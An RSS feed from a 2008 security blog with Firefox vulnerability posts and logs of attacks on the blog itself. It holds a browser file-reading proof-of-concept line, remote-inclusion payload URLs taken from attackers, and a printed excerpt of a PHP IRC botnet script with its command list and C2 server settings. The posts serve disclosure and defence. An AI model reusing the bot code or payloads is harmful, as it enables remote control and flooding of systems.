<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Kakkoi &#187; xss</title>
	<atom:link href="http://42.kaizeku.com/taxonomy/xss//feed/" rel="self" type="application/rss+xml" />
	<link>http://42.kaizeku.com</link>
	<description>web development, software, windows tips and trick</description>
	<pubDate>Sat, 12 Jul 2008 15:10:01 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
	<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Firefox 2.0.0.12 Information Leak</title>
		<link>http://42.kaizeku.com/security/exploit/firefox-20012-information-leak-vulnerability/</link>
		<comments>http://42.kaizeku.com/security/exploit/firefox-20012-information-leak-vulnerability/#comments</comments>
		<pubDate>Sun, 10 Feb 2008 11:21:37 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[Mozilla Firefox]]></category>

		<category><![CDATA[Security]]></category>

		<category><![CDATA[remote+exploit]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/exploit/firefox-20012-information-leak-vulnerability/</guid>
		<description><![CDATA[

We are going to see Firefox 2.0.0.13 probably by end of this week. Check out this directory transversal code using view-sources: &#038; resource: scheme
view-source:resource:///
translate to file:///C:/Program%20Files/Mozilla%20Firefox/
You can read/include firefox pref settings with this code. &#60;script src=&#8221;view-source:resource:///greprefs/all.js&#8221;&#62;&#60;/script&#62; 
Workaround
Install No-script Add-ons.

Credits
Ronald van den Heetkamp at 0&#215;000000
External Links

Firefox 2.0.0.12 Information Leak POC


]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/marvin-apbot-costume-by-chaoskaizer.jpg' alt='Marvin Apbot costume by chaoskaizer' width="100" height="100" longdesc="http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/marvin-apbot-costume-by-chaoskaizer.jpg" />We are going to see Firefox 2.0.0.13 probably by end of this week. Check out this directory transversal code using view-sources: &#038; resource: scheme<br />
<tt class="di">view-source:resource:///</tt><br />
translate to <tt class="di">file:///C:/Program%20Files/Mozilla%20Firefox/</tt></p>
<p>You can read/include firefox pref settings with this code. <tt>&lt;script src=&#8221;view-source:resource:///greprefs/all.js&#8221;&gt;&lt;/script&gt; </tt></p>
<h2 class="cb">Workaround</h2>
<p>Install <a class="exturl icn-r1" href="http://noscript.net/">No-script</a> Add-ons.</p>
<p><span id="more-197"></span></p>
<h2>Credits</h2>
<p><span class="vcard"><a class="url fn microformat icn-r1" href="http://www.0x000000.com/index.php?!=6"><span class="given-name">Ronald</span> <span class="family-name">van den Heetkamp</span></a> at <a class="url org exturl icn-r1" href="http://www.0x000000.com">0&#215;000000</a></span></p>
<h2>External Links</h2>
<ul>
<li><a class="exturl icn-r1" href="http://www.0x000000.com/index.php?i=515">Firefox 2.0.0.12 Information Leak POC</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/exploit/firefox-20012-information-leak-vulnerability/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Firefox 2.0.0.12 Security Release</title>
		<link>http://42.kaizeku.com/firefox/firefox-20012-security-release/</link>
		<comments>http://42.kaizeku.com/firefox/firefox-20012-security-release/#comments</comments>
		<pubDate>Fri, 08 Feb 2008 15:45:48 +0000</pubDate>
		<dc:creator>chaoskaizer.myopenid.com</dc:creator>
		
		<category><![CDATA[Mozilla Firefox]]></category>

		<category><![CDATA[Web Browsers]]></category>

		<category><![CDATA[browser]]></category>

		<category><![CDATA[cve]]></category>

		<category><![CDATA[gecko]]></category>

		<category><![CDATA[javascript]]></category>

		<category><![CDATA[thunderbird]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/firefox/firefox-20012-security-release/</guid>
		<description><![CDATA[

Firefox 2.0.0.12 Security Update fixes 7 Vulnerability &#38; 3 critical patch (memory corruption, JavaScript Engine Crashes).

 Known Vulnerabilities in Mozilla Products (Firefox 2.0.0.11) 

MFSA 2008-11

Web forgery overwrite with div overlay

Descriptions
Security researchers Emil Ljungdahl and Lars-Olof Moilanen demonstrated that, in cases where the entire contents of a page are enclosed in a &#60;div&#62; with absolute positioning, [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><a class="exturl icn-r1" href="http://www.mozilla.com/en-US/firefox/all.html"><strong>Firefox 2.0.0.12</strong></a> Security Update fixes <a class="exturl icn-r" href="http://www.mozilla.org/projects/security/known-vulnerabilities.html#firefox2.0.0.12">7 Vulnerability &amp; 3 critical patch</a> (memory corruption, <a class="exturl icn-r1" href="https://bugzilla.mozilla.org/buglist.cgi?bug_id=407720,390597,373344,398085,406572,391028,406036,402087">JavaScript Engine Crashes</a>).<br />
<span id="more-192"></span></p>
<h2 id="firefox2.0.0.12" class="cb"> Known Vulnerabilities in Mozilla Products (Firefox 2.0.0.11) </h2>
<dl class="xoxo def">
<dt class="b1t-"><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 low" href="http://www.mozilla.org/security/announce/2008/mfsa2008-11.html">MFSA 2008-11</a></dt>
<dd class="b1t-">
<h3 class="title- mg-">Web forgery overwrite with div overlay</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p>Security researchers <em>Emil Ljungdahl</em> and <em>Lars-Olof Moilanen</em> demonstrated that, in cases where the entire contents of a page are enclosed in a <tt class="di">&lt;div&gt;</tt> with absolute positioning, a web forgery warning dialog won&#8217;t be displayed unless the user switches tabs away-from then back-to the forgery page.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a rel="nofollow" class="exturl icn-r1" title="Web forgery warning not shown until tab switch" href="https://bugzilla.mozilla.org/show_bug.cgi?id=408164">Web forgery warning not shown until tab switch</a>
</li>
<li><a rel="nofollow" class="exturl icn-r1" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0594">National Vulnerability Database (NVD) - CVE-2008-0594</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 low" href="http://www.mozilla.org/security/announce/2008/mfsa2008-10.html">MFSA 2008-10</a></dt>
<dd>
<h3 class="title- mg-">URL token stealing via stylesheet redirect</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p>Security researcher <em>Martin Straka</em> reported that <strong>Gecko-based browsers</strong> update the <tt class="di">.href</tt> property of stylesheet DOM nodes to reflect the final URI of the stylesheet after following any 302 redirects (much as the <tt class="di">document.location</tt> property is updated). This differs from other browsers and could potentially reveal sensitive URL parameters, such as those used by Single-signon sytems, to scripts on the page.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="Stylesheet href property shows redirected URL unlike other browsers" href="https://bugzilla.mozilla.org/show_bug.cgi?id=397427">Stylesheet href property shows redirected URL unlike other browsers</a></li>
<li><a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0593">National Vulnerability Database (NVD) - CVE-2008-0593</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 low" href="http://www.mozilla.org/security/announce/2008/mfsa2008-09.html">MFSA 2008-09</a></dt>
<dd>
<h3 class="title- mg-">Mishandling of locally-saved plain text files</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p>Mozilla contributor <em>oo.rio.oo</em> demonstrated that once a file with <tt class="di">Content-Disposition: attachment</tt> and (improper) <tt class="di">Content-Type: plain/text</tt> is saved locally, the browser would no longer open local files with <tt class="di">.txt</tt> extensions for viewing, but would rather prompt the user to save the file.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="plain text txt file viewing capability lost after having downloaded a txt file" href="https://bugzilla.mozilla.org/show_bug.cgi?id=387258">plain text txt file viewing capability lost after having downloaded a txt file with content-disposition: attachment and content-type: plain/text</a></li>
<li>
<a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0592">National Vulnerability Database (NVD) - CVE-2008-0592</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 moderate" href="http://www.mozilla.org/security/announce/2008/mfsa2008-08.html">MFSA 2008-08</a></dt>
<dd>
<h3 class="title- mg-">File action dialog tampering</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p>Security researcher <em>Michal Zalewski</em> demonstrated that timer-enabled security dialogs can be subverted by attackers using JavaScript to change the window focus. Zalewski showed that a user could be tricked into confirming a security dialog of this type by bringing the dialog back into focus right before a user clicked in a predictable time and place.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="file action dialog controls vulnerable to refocus race" href="https://bugzilla.mozilla.org/show_bug.cgi?id=376473">file action dialog controls vulnerable to refocus race</a></li>
<li>
<a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0591">National Vulnerability Database (NVD) - CVE-2008-0591</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 critical" href="http://www.mozilla.org/security/announce/2008/mfsa2008-06.html">MFSA 2008-06</a></dt>
<dd>
<h3 class="title- mg-">Web browsing history and forward navigation stealing</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p>Mozilla contributor <em>David Bloom</em> reported a vulnerability in the way images are treated by the browser when a user leaves a page which utilizes <tt class="di">designMode</tt> frames. The reported issue can be used to steal a user&#8217;s navigation history, forward navigation information, and crash the user&#8217;s browser. The crash showed evidence of memory corruption and might be exploitable to run arbitrary code.<br />
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="Vulnerability allows script to see where user is headed, sniff history, and crash nsDocShell::Destroy() the browser too" href="https://bugzilla.mozilla.org/show_bug.cgi?id=400556">Vulnerability allows script to see where user is headed, sniff history, and crash [@ nsDocShell::Destroy()] the browser too</a></li>
<li>
<a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0419">National Vulnerability Database (NVD) - CVE-2008-0419</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 high" href="http://www.mozilla.org/security/announce/2008/mfsa2008-05.html">MFSA 2008-05</a></dt>
<dd>
<h3 class="title- mg-">Directory traversal via chrome: URI</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p><em>Gerry Eisenhaur</em> reported the chrome: URI scheme improperly allowed directory traversal that could be used to load JavaScript, images, and stylesheets from local files in known locations. This traversal was possible only when the browser had installed add-ons which used &#8220;flat&#8221; packaging rather than the more popular .jar packaging, and the attacker would need to target that specific add-on.</p>
<p>Mozilla researcher <strong>moz_bug_r_a4</strong> reported that this vulnerability could be used to steal the contents of the browser&#8217;s <tt class="di">sessionstore.js</tt> file, which contains session cookie data and information about currently open web pages.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="Allows to steal data from sessionstore.js" href="https://bugzilla.mozilla.org/show_bug.cgi?id=413451">Allows to steal data from sessionstore.js</a></li>
<li><a class="exturl icn-r1" title="chrome directory traversal (local disk access via flat addons)" href="https://bugzilla.mozilla.org/show_bug.cgi?id=413250">chrome directory traversal (local disk access via &#8220;flat&#8221; addons)</a></li>
<li><a class="exturl icn-r1" title="list of flat packaged add-ons" href="https://bugzilla.mozilla.org/attachment.cgi?id=300181">list of &#8220;flat&#8221; packaged add-ons</a></li>
<li><a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0418">National Vulnerability Database (NVD) - CVE-2008-0418</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 moderate" href="http://www.mozilla.org/security/announce/2008/mfsa2008-04.html">MFSA 2008-04</a></dt>
<dd>
<h3 class="title- mg-">Stored password corruption</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p>Mozilla developer <em>Justin Dolske</em> discovered that malicious sites, upon a user saving his or her password, could inject newlines into Firefox&#8217;s password store and corrupt saved passwords for other sites.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="Content can corrupt stored passwords by injecting line breaks" href="https://bugzilla.mozilla.org/show_bug.cgi?id=394610">Content can corrupt stored passwords by injecting line breaks</a></li>
<li><a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0417">National Vulnerability Database (NVD) - CVE-2008-0417</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 critical" href="http://www.mozilla.org/security/announce/2008/mfsa2008-03.html">MFSA 2008-03</a></dt>
<dd>
<h3 class="title- mg-">Privilege escalation, XSS, Remote Code Execution</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p>Mozilla contributors <strong>moz_bug_r_a4</strong> and <em>Boris Zbarsky</em> submitted a series of vulnerabilities which allow scripts from page content to escape from its sandboxed context and/or run with chrome privileges. An additional vulnerability reported by <tt class="di">moz_bug_r_a4</tt> demonstrated that the <tt class="di">XMLDocument.load()</tt> function can be used to inject script into another site, violating the browser&#8217;s same-origin policy.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="List of JavaScript privilege escalation bugs" href="https://bugzilla.mozilla.org/buglist.cgi?bug_id=386695,393761,393762,399298,407289,372075,363597">List of JavaScript privilege escalation bugs</a></li>
<li><a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0415">National Vulnerability Database (NVD) - CVE-2008-0415</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 moderate" href="http://www.mozilla.org/security/announce/2008/mfsa2008-02.html">MFSA 2008-02</a></dt>
<dd>
<h3 class="title- mg-">Multiple file input focus stealing vulnerabilities</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p>Security researchers <em>hong</em> and <em>Gregory Fleisher</em> each reported a variant on earlier reported bugs regarding focus shifting in file input controls. Their variants used file input controls nested inside <tt class="di">&lt;label&gt;</tt> tags to take advantage of automatic focus shifting into the file input field noted on the Hacker WebZine. As with the earlier reported issues this issue could be used to force a user to upload arbitrary files assuming the attacker knows the full path and name of the file.</p>
<p>These bugs are variations on earlier problems reported by <em>Charles McAuley</em> and <em>Michal Zalewski</em> which were fixed in <strong>Firefox 2.0.0.4</strong>, as well as an issue reported by hong which was fixed in <strong>Firefox 2.0.0.8</strong>.<br />
Gregory Fleisher also submitted a series of demonstrations of different ways to lure a user to place focus into the file input control manually. These demonstrations included &#8220;focus spoofing&#8221; by selectively capturing keystrokes and placing the captured characters where the user thinks the focus should be.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="List Focus shifting bugs" href="https://bugzilla.mozilla.org/buglist.cgi?bug_id=404451,408034,404391,405299">List of Focus shifting bugs</a></li>
<li><a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0414">National Vulnerability Database (NVD) - CVE-2008-0414</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 critical" href="http://www.mozilla.org/security/announce/2008/mfsa2008-01.html">MFSA 2008-01</a></dt>
<dd>
<h3 class="title- mg-">Crashes with evidence of memory corruption (rv:1.8.1.12)</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p>Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox 2.0.0.12 and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code.</p>
<p class="notice">Thunderbird shares the browser engine with Firefox and could be vulnerable if JavaScript were to be enabled in mail. This is not the default setting and we strongly discourage users from running JavaScript in mail. Without further investigation we cannot rule out the possibility that for some of these an attacker might be able to prepare memory for exploitation through some means other than JavaScript such as large images.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="JavaScript Engine Crashes" href="https://bugzilla.mozilla.org/buglist.cgi?bug_id=407720,390597,373344,398085,406572,391028,406036,402087">List of JavaScript Engine Crashes</a></li>
<li><a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0413">National Vulnerability Database (NVD) - CVE-2008-0413</a></li>
<li><a class="exturl icn-r1" title="Browser Crashes" href="https://bugzilla.mozilla.org/buglist.cgi?bug_id=398088,393141,364801,346405,396613,394337,406290">List of Browser Crashes Bugs</a></li>
<li><a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0412">National Vulnerability Database (NVD) - CVE-2008-0412</a></li>
</ul>
</div>
</dd>
</dl>
<h2 class="cb">Thunderbird Security Release</h2>
<p>Thunderbird 2.0.0.12 is schedule to be release on <a href="http://wiki.mozilla.org/Releases/Thunderbird_2.0.0.12">February 28</a>. </p>
<h2>External Links</h2>
<ul>
<li><a class="exturl icn-r1" href="http://www.mozilla.com/en-US/firefox/all.html">Download Firefox 2.0.0.12</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/firefox/firefox-20012-security-release/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Daily Hacking Attemps on blog.kakkoi.net - Feb 6th, 2008</title>
		<link>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/#comments</comments>
		<pubDate>Wed, 06 Feb 2008 22:59:53 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[script injection]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[BotNet]]></category>

		<category><![CDATA[botscan]]></category>

		<category><![CDATA[CMS]]></category>

		<category><![CDATA[csrf]]></category>

		<category><![CDATA[doorway]]></category>

		<category><![CDATA[fingering]]></category>

		<category><![CDATA[googlebot]]></category>

		<category><![CDATA[hack]]></category>

		<category><![CDATA[ircbot]]></category>

		<category><![CDATA[perlbot]]></category>

		<category><![CDATA[sql injection]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/</guid>
		<description><![CDATA[

 Today&#8217;s we just upgrade from WordPress 2.3.2 to 2.3.3 security release. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts &#8595;. The first attacker is from 212.24.62.200 &#8594; udkado.ru masking their useragent as Googlebot (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/hacking-attempts.png' alt='hacking attempts ' width='300' height='80' class="fl" /> Today&#8217;s we just upgrade from <strong>WordPress 2.3.2</strong> to <strong>2.3.3 security release</strong>. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts &darr;. The first attacker is from 212.24.62.200 &rarr; udkado.ru masking their useragent as <strong>Googlebot</strong> (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the attacker data to abuse network and IronPort. </p>
<p>The next few hours we received 20 attack from the same bot-herder. They probably has a large scale of <abbr title="Dynamic Domain Name Server">DDNS</abbr> (china &rarr; korea &rarr; us ). Noticeably the scans pattern is predictable. From our <a href="/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/">Feb 5th attack</a> all these botnet is targeting certain search keywords <em>security, injection</em> so we setup a honey-pot right on that particular URL.<br />
<span id="more-189"></span></p>
<h2>Hacking Attempts on Kakkoi</h2>
<p>Sort by Injection type.</p>
<table class="cb" id="hack-attemp-list">
<thead>
<tr>
<th>IP / DDNS</th>
<th><acronym title="User Agent">UA</acroynm></th>
<th><acronym title="Attack">ATT</acroynm></th>
<th>Country</th>
<th>Params</th>
</tr>
</thead>
<tbody>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=212.24.62.200" class="exturl icn-r" rel="nofollow">212.24.62.200</a></small></td>
<td><small><a href="http://www.useragentstring.com/pages/Googlebot/">Googlebot</a></small></td>
<td>1</td>
<td><small><a href="http://api.hostip.info/?ip=212.24.62.200" class="exturl icn-r" rel="nofollow">Russia</a></small></td>
<td>
<ul class="xoxo r">
<li><small>www.yahoo.com</small></li>
<li><small>Request URI: <a href="/uri/d3d3LnlhaG9vLmNvbQ.curie,80,302" rev="curie:302" title="Yahoo!">www.yahoo.com</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=61.152.158.46" class="exturl icn-r" rel="nofollow">61.152.158.46</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=61.152.158.46" class="exturl icn-r" rel="nofollow">China</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://basiclifesaving.org/mycomments/rom.txt</small></li>
<li><small>http://www.freewebtown.com/acc827/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td>
<ol class="xoxo r">
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=85.88.3.47" class="exturl icn-r" rel="nofollow">85.88.3.47</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=74.205.123.49" class="exturl icn-r" rel="nofollow">74.205.123.49</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=210.205.6.161" class="exturl icn-r" rel="nofollow">210.205.6.161</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=207.44.246.45" class="exturl icn-r" rel="nofollow">207.44.246.45</a></small></li>
</ol>
</td>
<td>N/A</td>
<td>16</td>
<td>
<ol class="xoxo r">
<li><small><a href="http://api.hostip.info/?ip=85.88.3.47" class="exturl icn-r" rel="nofollow">Germany</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=74.205.123.49" class="exturl icn-r" rel="nofollow">US</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=210.205.6.161" class="exturl icn-r" rel="nofollow">Korea</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=207.44.246.45" class="exturl icn-r" rel="nofollow">US</a></small></li>
</ol>
</td>
<td>
<ul class="xoxo r">
<li><small>http://basiclifesaving.org/mycomments/rom.txt</small></li>
<li><small>http://www.freewebtown.com/acc827/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
</tbody>
</table>
<h2>The Bot-herder Host</h2>
<p>Part of class <strong>pBot</strong> source taken from <tt class="di">http://basiclifesaving.org/mycomments/rom.txt</tt></p>
<pre class="prebox">
&lt;? 

/*
 *
 * #crew@corp. since 2003
 * edited by: devil__ &lt;admin@xdevil.org&gt;
 *
 * COMMANDS:
 *
 * .user &lt;password&gt; //login to the bot
 * .logout //logout of the bot
 * .die //kill the bot
 * .restart //restart the bot
 * .mail &lt;to&gt; &lt;from&gt; &lt;subject&gt; &lt;msg&gt; //send an email
 * .dns &lt;IP|HOST&gt; //dns lookup
 * .download &lt;URL&gt; &lt;filename&gt; //download a file
 * .exec &lt;cmd&gt; // uses exec() //execute a command
 * .sexec &lt;cmd&gt; // uses shell_exec() //execute a command
 * .cmd &lt;cmd&gt; // uses popen() //execute a command
 * .info //get system information
 * .php &lt;php code&gt; // uses eval() //execute php code
 * .tcpflood &lt;target&gt; &lt;packets&gt; &lt;packetsize&gt; &lt;port&gt; &lt;delay&gt; //tcpflood attack
 * .udpflood &lt;target&gt; &lt;packets&gt; &lt;packetsize&gt; &lt;delay&gt; //udpflood attack
 * .raw &lt;cmd&gt; //raw IRC command
 * .rndnick //change nickname
 * .pscan &lt;host&gt; &lt;port&gt; //port scan
 * .safe // test safe_mode (dvl)
 * .inbox &lt;to&gt; // test inbox (dvl)
 * .conback &lt;ip&gt; &lt;port&gt; // conect back (dvl)
 * .uname // return shell's uname using a php function (dvl)
 *
 */

set_time_limit(0);
error_reporting(0);
echo &quot;Ok unlocker. We did i!&quot;;

class pBot
{
 var $config = array(&quot;server&quot;=&gt;&quot;Bucharest.ro.eu.ultra-chat.org&quot;,
 &quot;port&quot;=&gt;&quot;6667&quot;,
 &quot;pass&quot;=&gt;&quot;n&quot;,
 &quot;prefix&quot;=&gt;&quot;[R]&quot;,
 &quot;maxrand&quot;=&gt;&quot;4&quot;,
 &quot;chan&quot;=&gt;&quot;#unlocker&quot;,
 &quot;chan2&quot;=&gt;&quot;#unlocker&quot;,
 &quot;key&quot;=&gt;&quot;n&quot;,
 &quot;modes&quot;=&gt;&quot;+p&quot;,
 &quot;password&quot;=&gt;&quot;n&quot;,
 &quot;trigger&quot;=&gt;&quot;.&quot;,
 &quot;hostauth&quot;=&gt;&quot;Robert.users.ultra-chat.org&quot; // * for any hostname (remember: /setvhost xdevil.org)
 );
</pre>
<h2>Related Posts</h2>
<ul>
<li><a rev="site:related" href="/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/">Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008</a></li>
<li><a rev="site:related" href="/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/">Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot &#038; Trojan</a></li>
</ul>
<h2>External Links</h2>
<ul class="xoxo">
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Wikipedia &rarr; Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Storm_botnet">Storm Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Dynamic_DNS">Dynamic DNS</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008</title>
		<link>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/#comments</comments>
		<pubDate>Tue, 05 Feb 2008 12:13:27 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[script injection]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[BotNet]]></category>

		<category><![CDATA[botscan]]></category>

		<category><![CDATA[CMS]]></category>

		<category><![CDATA[csrf]]></category>

		<category><![CDATA[doorway]]></category>

		<category><![CDATA[fingering]]></category>

		<category><![CDATA[hack]]></category>

		<category><![CDATA[ircbot]]></category>

		<category><![CDATA[perlbot]]></category>

		<category><![CDATA[sql injection]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/</guid>
		<description><![CDATA[

 I received lots of multiple botnet injection (e.g: code &#038; sql) on my wordpress blog. All the failed attempts from these Botnet (Bot-herder) will be published in this post. Somebody might find the informations useful &#8595;.

Failed Hacking Attempts
Sort by Injection type.



IP / DDNS
UA
ATT
Country
Params




85.25.10.30
N/A
2
Germany


http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt
Request URI: /security/injection/




]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/hacking-attempts.png' alt='hacking attempts ' width='300' height='80' class="fl" /> I received lots of multiple botnet injection (e.g: code &#038; sql) on my wordpress blog. All the failed attempts from these <a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Botnet</a> (Bot-herder) will be published in this post. Somebody might find the informations useful &darr;.<br />
<span id="more-178"></span></p>
